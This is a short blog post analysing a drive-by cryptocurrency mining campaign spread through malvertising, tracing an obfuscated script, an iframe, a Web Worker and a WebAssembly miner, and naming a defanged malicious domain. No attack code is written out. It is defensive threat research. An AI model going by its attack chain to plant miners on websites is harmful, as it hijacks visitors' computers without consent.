2017年9月27日水曜日

Looking into Drive-by Mining

First

Recently, reports on Mining from ESET, Sucuri and Malwarebytes were released. Drive-by Download is not as strong as before, but Drive-by Mining is trying to rise. Drive-by Mining has two pattern, tampering general websites and Malvertising. Similar traffic was also observed in my traffic observation environment. I noticed that there are several campaigns, and one of them is very interesting. About it, I show a simple report.

Traffic Analysis

Entrance is a general website. This website was loading advertisements. It causes Malvertising. In this website, this code was loaded.



About "code[.]moviead55[.]ru", you can refer to the ESET report.
"Cryptocurrency web mining: In union there is profit"

But, it generated traffic that was slightly different from the report.

The read code is simple obfuscated. When it is decoded, after some processing, an iframe is generated.



This iframe loads html. That html contained such a code.



Let's see JavaScript registered in Worker.



This is the wasm that is being loaded.
https://www.virustotal.com/#/file/1fd2bc9a5011ad82b543b51b8f800d47bc5d8229a01263de620f878088ff585a/detection

convert.js was similar to the code published on GitHub. It was a very similar code.
https://github.com/mtve/yazecminer

Finally, this is traffic chain.

While accessing, my CPU was high load.

Conclusion

Attackers always use the latest technology. I found a lot of sites using coin-hive etc in Drive-by Mining. If you have high load on CPU when accessing websites, possibility of Mining.




0 件のコメント:

コメントを投稿